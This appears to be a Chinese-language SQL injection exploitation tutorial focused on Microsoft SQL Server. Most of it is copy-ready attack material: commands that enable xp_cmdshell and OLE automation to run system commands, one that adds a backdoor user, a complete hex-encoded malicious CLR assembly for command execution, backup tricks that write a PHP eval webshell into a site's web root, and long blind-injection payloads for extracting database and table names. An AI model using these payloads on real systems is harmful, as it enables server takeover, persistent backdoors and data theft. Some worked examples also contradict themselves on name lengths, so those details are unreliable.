判斷數據庫的類型
當我們通過一些測試,發現存在SQL注入之后,首先要做的就是判斷數據庫的類型。
常用的數據庫有MySQL、Access、SQLServer、Oracle、PostgreSQL。雖然絕大多數數據庫的大部分SQL語句都類似,但是每個數據庫還是有自己特殊的表的。通過表我們可以分辨是哪些數據庫。
MySQL數據庫的特有的表是 information_schema.tables , access數據庫特有的表是 msysobjects ,SQLServer 數據庫特有的表是 sysobjects ,oracle數據庫特有的表是 dual。那么,我們就可以用如下的語句判斷數據庫。哪個頁面正常顯示,就屬於哪個數據庫
或者也可以通過查詢版本來確定:
MySQL數據庫注入
MySQL是 最熟悉的 ,就不展開了。
詳細的注入和繞過可以參考:https://xz.aliyun.com/t/7169 寫的挺好
SQLServer數據庫注入
判斷當前用戶權限
SQLServer有三個權限級別:
- sa權限:數據庫操作,文件管理,命令執行,注冊表讀取等system。SQLServer數據庫的最高權限
- db權限:文件管理,數據庫操作等權限 users-administrators
- public權限:數據庫操作 guest-users
判斷是否是SA權限
select is_srvrolemember('sysadmin')
判斷是否是db_owner權限
select is_member('db_owner')
判斷是否是public權限
select is_srvrolemember('public')
SQLServer數據庫有6個默認的庫,分別是4個系統數據庫:master 、model 、msdb 、tempdb,和2個實例數據庫:ReportServer、ReportServerTempDB。其中,系統數據庫 model 和 tempdb 默認是沒有數據表的。
- master數據庫:master數據庫控制SQL Server的所有方面。這個數據庫中包括所有的配置信息、用戶登錄信息、當前正在服務器中運行的過程的信息。
- model數據庫:model數據庫是建立所有用戶數據庫時的模板。當你建立一個新數據庫時,SQL Server會把model數據庫中的所有對象建立一份拷貝並移到新數據庫中。在模板對象被拷貝到新的用戶數據庫中之后,該數據庫的所有多余空間都將被空頁填滿。
- msdb數據庫:msdb數據庫是SQL Server中的一個特例。如果你查看這個數據庫的實際定義,會發現它其實是一個用戶數據庫。不同之處是SQL Server拿這個數據庫來做什么。所有的任務調度、報警、操作員都存儲在msdb數據庫中。該庫的另一個功能是用來存儲所有備份歷史。SQL Server Agent將會使用這個庫。
- tempdb數據庫:tempdb數據庫是一個非常特殊的數據庫,供所有來訪問你的SQL Server的用戶使用。這個庫用來保存所有的臨時表、存儲過程和其他SQL Server建立的臨時用的東西。例如,排序時要用到tempdb數據庫。數據被放進tempdb數據庫,排完序后再把結果返回給用戶。每次SQL Server重新啟動,它都會清空tempdb數據庫並重建。永遠不要在tempdb數據庫建立需要永久保存的表。
但是如果用navicat遠程連接的話,只會顯示2個實例數據庫:ReportServer、ReportServerTempDB
SQLServer數據庫的查詢語句
#常用語句
select @@version; #查詢數據庫的版本
select @@servername; #查詢服務名
select host_name(); #查詢主機名,如果是用navicat遠程連接的話,主機名是本地的名字
select db_name(); #查詢當前數據庫名
select db_name(1); #查詢第一個數據庫名
select db_name(2); #查詢第二個數據庫名
select user; #查詢當前數據庫的擁有者,結果為 dbo。dbo是每個數據庫的默認用戶,具有所有者權限,全稱:datebaseOwner ,即DbOwner
use tempdb #切換到tempdb表
top n #查詢前n條記錄
limit 2,3 #查詢第2條開始的3條數據,也就是2,3,4
select substring('string',2,1) #截取給定字符串的索引為2的1個字符
select ascii('a') #查詢給定字符串的ascii值
select len('string') #查詢給定字符串的長度
EXEC sp_spaceused @updateusage = N'TRUE'; #查詢當前數據庫的大小
sp_spaceused '表名' #查詢指定表名的大小
#數據庫的連接
server=127.0.0.1;UID=sa;PWD=123456;database=master;Provider=SQLOLEDB
mssql://sa:123456@127.0.0.1/XCCMS_SocialBusinessDB
#查詢數據庫
count(name)是查詢總數
name是查詢名字
*是查詢詳細信息
select count(name) from sysdatabases #查詢數據庫的個數,只有當前數據庫是master的時候,才能執行該命令
select name from sysdatabases #查詢數據庫的名字
select * from sysdatabases #查詢所有數據庫的信息
#查詢數據表
select count(name) from sysobjects where type='U' #查詢當前數據庫中表的個數
select name from sysobjects where type='U' #查詢當前數據庫中所有表的名字
select * from sysobjects where type='U' #查詢當前數據庫的所有表的詳細信息
select count(name) from test..sysobjects where xtype='U' #查詢指定test數據庫中表的個數
select name from test..sysobjects where xtype='U' #查詢指定test數據庫中表的名字
select * from test..sysobjects where xtype='U' #查詢指定test數據庫中表的詳細信息
#查詢列
select count(name) from syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users') #查詢當前數據庫的指定users表的列的個數
select name from syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users') #查詢當前數據庫的指定users表的所有列的名字
select * from syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users') #查詢當前數據庫的指定users表的列的詳細信息
select count(name) from test..syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users') #查詢指定test數據庫的指定users表的列的個數
select name from test..syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users') #查詢指定test數據庫的指定users表的所有列的名字
select * from test..syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users') #查詢指定test數據庫的指定users表的列的詳細信息
#查詢數據
select count(*) from test..users #查詢test數據庫user表的數據的條數
select * from test..users #查詢test數據庫user表的所有數據
SA權限開啟xp_cmdshell獲取主機權限
判斷xp_cmdshell狀態
我們可以在master.dbo.sysobjects中查看xp_cmdshell狀態
只用判斷存在,利用count(*)即可。
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
xtype為對象類型,xtype='x'這里表示xp_cmdshell的對象類型為擴展存儲過程。
存在即返回1
啟用xp_cmdshell
如果xp_cmdshell權限沒開啟的話,我們可以利用EXEC啟用xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
也可以用如下語句:
execute('sp_configure "show advanced options",1') #將該選項的值設置為1
execute('reconfigure') #保存設置
execute('sp_configure "xp_cmdshell", 1') #將xp_cmdshell的值設置為1
execute('reconfigure') #保存設置
利用xp_cmdshell執行命令
通過xp_cmdshell執行系統命令指令如下: (master.. 可以不加)
exec master..xp_cmdshell 'whoami'
利用xp_cmdshell寫文件
先利用 dir 找到web服務根目錄
exec master..xp_cmdshell 'dir'
然后通過 echo 將一句話木馬寫入文件,即可連webshell
exec xp_cmdshell 'echo test>d:\1.txt'
恢復被刪除的xp_cmdshell
我們可以利用xplog70.dll恢復被刪除的xp_cmdshell
Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\\xplog70.dll'
SA權限使用sp_oacreate執行系統命令
使用sp_oacreate提權前提條件:
SQLServer數據庫服務未降權 (因為需要調用COM組件)
我們可以借助SQLServer中的COM組件SP_OACREATE來執行系統命令,使用下面命令查看是否可使用 sp_oacreate 執行系統命令:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'whoami'
如果SQLServer 阻止了對組件 ‘Ole Automation Procedures’ 的過程 ‘sys.sp_OACreate’ 的訪問,可以使用以下命令打開:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;
再次執行命令,發現不報錯。此時可以執行系統命令了,但是使用 sp_oacreate 執行系統命令不回顯:
於是我們可以使用以下命令創建用戶hack:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user hack Password@ /add'
SA權限使用CLR執行系統命令
#啟用MSSQL CLR功能
exec sp_configure 'show advanced options', 1;
RECONFIGURE;
Exec sp_configure 'clr enabled', 1;
RECONFIGURE;
#為了導入了不安全的程序集,我們還需要將數據庫標記為安全。
ALTER DATABASE [master] SET TRUSTWORTHY ON;
#導入程序集,單獨執行
CREATE ASSEMBLY [WarSQLKit] AUTHORIZATION [dbo] FROM 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c0103006643f55f0000000000000000e00022200b013000000e00000006000000000000022d0000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000b02c00004f00000000400000b803000000000000000000000000000000000000006000000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e74657874000000080d000000200000000e000000020000000000000000000000000000200000602e72737263000000b8030000004000000004000000100000000000000000000000000000400000402e72656c6f6300000c0000000060000000020000001400000000000000000000000000004000004200000000000000000000000000000000e42c00000000000048000000020005005c220000540a00000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000be280e00000a72010000706f0f00000a280e00000a7243000070725300007002281000000a28020000066f0f00000a2a1b300600a40100000100001173040000060a731100000a0b076f1200000a026f1300000a03281400000a2d0c076f1200000a036f1500000a076f1200000a176f1600000a076f1200000a176f1700000a076f1200000a166f1800000a076f1200000a176f1900000a076f1200000a176f1a00000a06731b00000a7d010000040706fe0605000006731c00000a6f1d00000a140c076f1e00000a26076f1f00000a076f2000000a6f2100000a0c076f2200000ade390d280e00000a1b8d160000012516725d000070a2251702a2251803a225197291000070a2251a096f2300000aa2282400000a6f0f00000ade00076f2500000a2d1a280e00000a067b010000046f2600000a6f0f00000a3895000000731b00000a130408281400000a2d091104086f2700000a26067b010000046f2800000a2c20110472970000706f2700000a261104067b010000046f2600000a6f2700000a26280e00000a1c8d16000001251602a2251703a2251872af000070a22519076f2500000a13051205282900000aa2251a7291000070a2251b1104252d0426142b056f2600000aa2282400000a6f0f00000a067b010000046f2600000a2a011000000000870021a80039100000011e02282a00000a2a4e027b01000004046f2b00000a6f2700000a262a42534a4201000100000000000c00000076322e302e35303732370000000005006c00000038030000237e0000a4030000a804000023537472696e6773000000004c080000e80000002355530034090000100000002347554944000000440900001001000023426c6f620000000000000002000001571502000902000000fa013300160000010000001c000000030000000100000005000000050000002b0000000d000000010000000100000003000000010000000000b1020100000000000600ed01ae0306005a02ae03060038019b030f00ce03000006004c01cd020600d001cd020600b101cd0206004102cd0206000d02cd0206002602cd0206007901cd0206009401cd0206003004c6020a0063014e030e0009049b030600df02c602060020036e0406001d01ae030e00ee039b030a007a044e030a0015014e0306008e02c6020e00f7029b030e00c4009b030e0035039b0306000803360006001503360006002700c602000000002d00000000000100010001001000dd030000350001000100030110000100000035000100040006006404740050200000000096005e007800010080200000000096008b001a00020040220000000086189503060004004022000000008618950306000400482200000000830016007d000400000001007d0000000100e400000002001f04000001002e03000002000404090095030100110095030600190095030a00290095031000310095031000390095031000410095031000490095031000510095031000590095031000610095031000710095030600910095030600a1000c011500a90096001000b10029041a007900950306007900e9022d00b900d7001000b10098043200b90011041000b90085043700b900b4003c00b90078023700b9007b033700b90049043700890095030600c90095034200790066004800790043044e007900ed000600790069035200d900810057007900370406008100a8005700b10029045b0079009b00610069008c025700890001016500890095026100e1008c02570069009503060099004c005700200063000b012e000b0084002e0013008d002e001b00ac002e002300b5002e002b00cb002e003300cb002e003b00cb002e004300d1002e004b00e1002e005300cb002e005b00fe0063006b000b012000048000000100000000000000000000000000a00200000200000000000000000000006b005500000000000200000000000000000000006b004000000000000200000000000000000000006b00c60200000000030002000000003c3e635f5f446973706c6179436c617373315f30003c52756e436f6d6d616e643e625f5f3000496e743332003c4d6f64756c653e0053797374656d2e494f0053797374656d2e44617461006765745f44617461006d73636f726c696200436d6445786563006164645f4f757470757444617461526563656976656400636d640052656164546f456e640052756e436f6d6d616e640053656e64006765745f45786974436f6465006765745f4d657373616765007365745f57696e646f775374796c650050726f6365737357696e646f775374796c65007365745f46696c654e616d650066696c656e616d6500426567696e4f7574707574526561644c696e6500417070656e644c696e65006765745f506970650053716c5069706500436f6d70696c657247656e6572617465644174747269627574650044656275676761626c6541747472696275746500417373656d626c795469746c654174747269627574650053716c50726f63656475726541747472696275746500417373656d626c7954726164656d61726b41747472696275746500417373656d626c7946696c6556657273696f6e41747472696275746500417373656d626c79436f6e66696775726174696f6e41747472696275746500417373656d626c794465736372697074696f6e41747472696275746500436f6d70696c6174696f6e52656c61786174696f6e7341747472696275746500417373656d626c7950726f6475637441747472696275746500417373656d626c79436f7079726967687441747472696275746500417373656d626c79436f6d70616e794174747269627574650052756e74696d65436f6d7061746962696c697479417474726962757465007365745f5573655368656c6c4578656375746500546f537472696e67006765745f4c656e6774680057617253514c4b69744d696e696d616c0057617253514c4b69744d696e696d616c2e646c6c0053797374656d0053797374656d2e5265666c656374696f6e00457863657074696f6e006765745f5374617274496e666f0050726f636573735374617274496e666f0053747265616d526561646572005465787452656164657200537472696e674275696c6465720073656e646572004461746152656365697665644576656e7448616e646c6572004d6963726f736f66742e53716c5365727665722e536572766572006765745f5374616e646172644572726f72007365745f52656469726563745374616e646172644572726f72002e63746f720053797374656d2e446961676e6f73746963730053797374656d2e52756e74696d652e436f6d70696c6572536572766963657300446562756767696e674d6f6465730053746f72656450726f63656475726573004461746152656365697665644576656e744172677300617267730050726f63657373007365745f417267756d656e747300617267756d656e747300436f6e636174004f626a6563740057616974466f7245786974005374617274007365745f52656469726563745374616e646172644f7574707574007374644f75747075740053797374656d2e546578740053716c436f6e74657874007365745f4372656174654e6f57696e646f770049734e756c6c4f72456d707479000000004143006f006d006d0061006e0064002000690073002000720075006e006e0069006e0067002c00200070006c006500610073006500200077006100690074002e00000f63006d0064002e00650078006500000920002f006300200000334f00530020006500720072006f00720020007700680069006c006500200065007800650063007500740069006e006700200000053a002000001753007400640020006f00750074007000750074003a0000372000660069006e00690073006800650064002000770069007400680020006500780069007400200063006f006400650020003d0020000000c1b0e79eb8eb6348be1e0c1d83c2d05800042001010803200001052001011111042001010e04000012550500020e0e0e0c0706120c123d0e1241124508042000125d040001020e0420010102052001011161052002011c180520010112650320000204200012690320000e0500010e1d0e0320000805200112450e08b77a5c561934e08903061245040001010e062002011c124d0801000800000000001e01000100540216577261704e6f6e457863657074696f6e5468726f7773010801000200000000001501001057617253514c4b69744d696e696d616c00000501000000000f01000a457975702043454c494b00001c010017687474703a2f2f6579757063656c696b2e636f6d2e747200000c010007312e302e302e3000000401000000d82c00000000000000000000f22c0000002000000000000000000000000000000000000000000000e42c0000000000000000000000005f436f72446c6c4d61696e006d73636f7265652e646c6c0000000000ff25002000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000005c03000000000000000000005c0334000000560053005f00560045005200530049004f004e005f0049004e0046004f0000000000bd04effe00000100000001000000000000000100000000003f000000000000000400000002000000000000000000000000000000440000000100560061007200460069006c00650049006e0066006f00000000002400040000005400720061006e0073006c006100740069006f006e00000000000000b004bc020000010053007400720069006e006700460069006c00650049006e0066006f0000009802000001003000300030003000300034006200300000001a000100010043006f006d006d0065006e007400730000000000000022000100010043006f006d00700061006e0079004e0061006d00650000000000000000004a0011000100460069006c0065004400650073006300720069007000740069006f006e0000000000570061007200530051004c004b00690074004d0069006e0069006d0061006c0000000000300008000100460069006c006500560065007200730069006f006e000000000031002e0030002e0030002e00300000004a001500010049006e007400650072006e0061006c004e0061006d0065000000570061007200530051004c004b00690074004d0069006e0069006d0061006c002e0064006c006c00000000005400180001004c006500670061006c0043006f007000790072006900670068007400000068007400740070003a002f002f006500790075007000630065006c0069006b002e0063006f006d002e007400720000002a00010001004c006500670061006c00540072006100640065006d00610072006b00730000000000000000005200150001004f0072006900670069006e0061006c00460069006c0065006e0061006d0065000000570061007200530051004c004b00690074004d0069006e0069006d0061006c002e0064006c006c000000000036000b000100500072006f0064007500630074004e0061006d0065000000000045007900750070002000430045004c0049004b0000000000340008000100500072006f006400750063007400560065007200730069006f006e00000031002e0030002e0030002e003000000038000800010041007300730065006d0062006c0079002000560065007200730069006f006e00000031002e0030002e0030002e003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000c000000043d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 WITH PERMISSION_SET = UNSAFE;
#創建存儲過程,單獨執行
CREATE PROCEDURE sp_cmdExec @Command [nvarchar](4000) WITH EXECUTE AS CALLER AS EXTERNAL NAME WarSQLKit.StoredProcedures.CmdExec;
#執行命令
EXEC sp_cmdExec 'whoami';
#刪除該程序集
DROP PROCEDURE sp_cmdExec;DROP ASSEMBLY [WarSQLKit];
DB_owner權限LOG備份Getshell
無論是LOG備份還是差異備份,都是利用備份的過程中寫入一句話木馬
SQLServer常見的備份策略:
- 每周一次完整備份
- 每天一次差異備份
- 每小時一次事務日志備份
利用前提:
- 目標機器存在數據庫備份文件 ,也就是如下,我們利用test數據庫的話,則需要該test數據庫存在數據庫備份文件
- 知道網站的絕對路徑
- 該注入支持堆疊注入
具體操作:
alter database 數據庫名 set RECOVERY FULL; #修改數據庫恢復模式為 完整模式
create table cmd (a image); #創建一張表cmd,只有一個列 a,類型為image
backup log 數據庫名 to disk= 'C:\phpstudy\WWW\1.php' with init; #備份表到指定路徑
insert into cmd (a) values(0x3c3f70687020406576616c28245f504f53545b785d293b3f3e); #插入一句話到cmd表里
backup log 數據庫名 to disk='C:\phpstudy\WWW\2.php'; #把操作日志備份到指定文件
drop table cmd; #刪除cmd表
第四行的 0x3c3f70687020406576616c28245f504f53545b785d293b3f3e 是一句話木馬 <?php @eval($_POST[x]);?> 的16進制表示
會在目標網站根目錄下生成1.php和2.php文件,其中1.php 保存數據庫,2.php就是我們需要連接的木馬文件。
DB_owner權限差異備份Getshell
注:差異備份有概率會把網站搞崩,所以不建議使用差異備份
利用前提:
- 知道網站的絕對路徑 C:phpstudyWWW
- 該注入支持堆疊注入
注:以下語句一條一條執行
create table [dbo].[test] ([cmd] [image])
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x786965 backup log @a to disk = @s with init,no_truncate
insert into [test](cmd) values(0x3c3f70687020406576616c28245f504f53545b785d293b3f3e)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x43003A005C00700068007000730074007500640079005C005700570057005C007300680065006C006C002E00700068007000 backup log @a to disk=@s with init,no_truncate
Drop table [test]
- 這里第二行的 0x786965,是字符 xie 的16進制表示,這里隨便填都可以
- 第三行的 0x3c3f70687020406576616c28245f504f53545b785d293b3f3e 是一句話木馬 <?php @eval($_POST[x]);?> 的16進制表示
- 第四行的0x43003A005C00700068007000730074007500640079005C005700570057005C007300680065006C006C002E00700068007000是 C:\phpstudy\WWW\shell.php 的16進制表示
然后會在目標網站根目錄下生成shell.php木馬文件
盲注SQLServer數據庫
判斷當前數據庫用戶權限
and 1=(IS_SRVROLEMEMBER('sysadmin')) //返回正常為sa
and 1=(IS_MEMBER('db_owner')) //返回正常為DB_OWNER
and 1=(IS_srvrolemember('public')) //public權限,較低
如果當前用戶是sa,則執行三個都正常顯示。如果是db_owner,則執行sa不正常顯示,執行public正常顯示。如果是public,則只執行public才正常顯示
判斷xp_cmdshell是否存在
and 1=(Select count(*) FROM master..sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
正常顯示,說明已開啟。如果不存在,則需要開啟。
如果開啟后,想要通過xp_cmdshell執行系統命令,需要該注入點存在堆疊注入
判斷數據庫的個數
and (select count(name) from master..sysdatabases)=N
由圖可知,有7個數據庫
判斷dbid個數,一般數據庫有多少個,dbid的值就為多少
and (select count(*) from master..sysdatabases where dbid=N)=1
通過dbid得到所有數據庫名
當使用上一條命令不能執行時,可以使用下面的命令,查詢數據庫的個數,以及每個數據庫的名字
判斷dbid數據庫的長度,由以下得知dbid為1數據庫的長度是8
and len(db_name(1))>5 //正常顯示
and len(db_name(1))>6 //不正常顯示
大於5正常顯示,大於6不正常顯示,所以第一個數據庫長度是6,即
一般來說,查的前6個數據庫就是自帶的那6個數據庫,第7個開始才是我們自己建的
and len(db_name(7))>3 //正常顯示
and len(db_name(7))>4 //不正常顯示
大於3正常顯示,大於4不正常顯示,所以第7個數據庫名的長度為4
判斷dbid為7數據庫字符的ascii值
and ascii(substring(db_name(7),1,1))>100 //正常顯示
and ascii(substring(db_name(7),1,1))>150 //不正常顯示
and ascii(substring(db_name(7),1,1))>125 //不正常顯示
and ascii(substring(db_name(7),1,1))>112 //正常顯示
and ascii(substring(db_name(7),1,1))>118 //不正常顯示
and ascii(substring(db_name(7),1,1))>115 //正常顯示
and ascii(substring(db_name(7),1,1))>116 //不正常顯示
大於115正常顯示,大於116不正常顯示,所以第七個數據庫的第一個字符的ascii值為116,對應的字符是t
以此類推,數據庫的第二個字符為 and ascii(substring(db_name(7),2,1))>100
數據庫的第三個字符為:and ascii(substring(db_name(7),3,1))>100
數據庫的第三個字符為:and ascii(substring(db_name(7),4,1))>100
最后得到第7個數據庫名為:test
判斷當前數據庫名
判斷數據庫的長度,由以下得知數據庫的長度是8
and len(db_name())>3 //正常顯示
and len(db_name())>4 //不正常顯示
大於3正常顯示,大於4不正常顯示,所以數據庫名的長度為4
判斷數據庫字符的ascii值,用二分法
and ascii(substring(db_name(),1,1))>100 //正常顯示
and ascii(substring(db_name(),1,1))>150 //不正常顯示
and ascii(substring(db_name(),1,1))>125 //不正常顯示
and ascii(substring(db_name(),1,1))>112 //正常顯示
and ascii(substring(db_name(),1,1))>118 //不正常顯示
and ascii(substring(db_name(),1,1))>115 //正常顯示
and ascii(substring(db_name(),1,1))>116 //不正常顯示
大於115正常顯示,大於116不正常顯示,所以數據庫第一個字符的ascii值為116,對應的字符是t
以此類推,數據庫的第二個字符為 and ascii(substring(db_name(),2,1))>100
數據庫的第三個字符為:and ascii(substring(db_name(),3,1))>100
數據庫的第三個字符為:and ascii(substring(db_name(),4,1))>100
最后得到數據庫名為:test
爆破test數據庫中表的個數
and (select count(name) from test..sysobjects where xtype='U')>0 正常顯示
and (select count(name) from test..sysobjects where xtype='U')>1 不正常顯示
所以test數據庫只有一個表
爆破test數據庫中表
這里爆破表的時候,不能爆破表名的長度,所以只能爆破表名的一個一個字符。當爆破到第某個字符出現其ascii值>0都不正常顯示時,說明這個字符位不存在,所以到前一位為止。注意,這里爆破得到的表名有 dbo.
第一個表的第一個字符的ascii值:
AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 0 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),1,1))>N
第一個表的第二個字符的ascii值:
AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 0 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),2,1))>N
第一個表的第三個字符的ascii值:
AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 0 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),3,1))>N
......
當爆破到第10個字符的時候,發現>0都不正常顯示,說明不存在第10位
爆破得到表名為:dbo.users
如果有第二個表,第三個表...
爆破第二個表的第一個字符的ascii值:
AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 1 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),1,1))>N
爆破第二個表的第二個字符的ascii值:
AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 1 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),2,1))>N
爆破第二個表的第三個字符的ascii值:
AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 1 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),3,1))>N
......
爆破第三個表的第一個字符的ascii值:
AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 2 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),1,1))>N
爆破第三個表的第二個字符的ascii值:
AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 2 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),2,1))>N
爆破第三個表的第三個字符的ascii值:
